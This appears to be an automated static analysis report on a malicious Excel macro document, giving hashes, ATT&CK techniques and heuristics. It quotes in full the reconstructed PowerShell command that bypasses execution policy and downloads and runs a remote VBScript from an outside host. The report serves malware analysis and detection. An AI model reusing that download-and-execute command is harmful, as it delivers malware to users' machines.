Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 4094d336475f1eba…

MALICIOUS

Office (OLE) / .XLS

212.5 KB Created: 2020-10-12 13:04:16 Authoring application: Microsoft Excel
MD5: 0eb19372adcf0ad41c37b96bae34a14c SHA-1: f96742455d46b6939534eadb2c0346af6ebf0658 SHA-256: 4094d336475f1eba9675e8a9273f9c3a01822081eeaca6a747b482488984240e
60 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1218.011 Signed Binary Proxy Execution: Rundll32

The sample contains VBA macros that utilize the GetObject function, a common technique for executing code. The macros reconstruct a PowerShell command that downloads and executes a VBScript from 'http://achremittanteservices.com/ADP/VAT.vbs'. This VBScript is then executed via 'C:\WINDOWS\System.vbs', indicating a downloader or dropper functionality. The reconstructed PowerShell command is: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://achremittanteservices.com/ADP/VAT.vbs')".

Heuristics 2

  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas
921d83244c32f5d709ab74c4d50cf06aab7facd93c4eccbbeeeadb2a5439373a		 vba-macro oletools.olevba.extract_macros (decoded VBA source) 1260 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.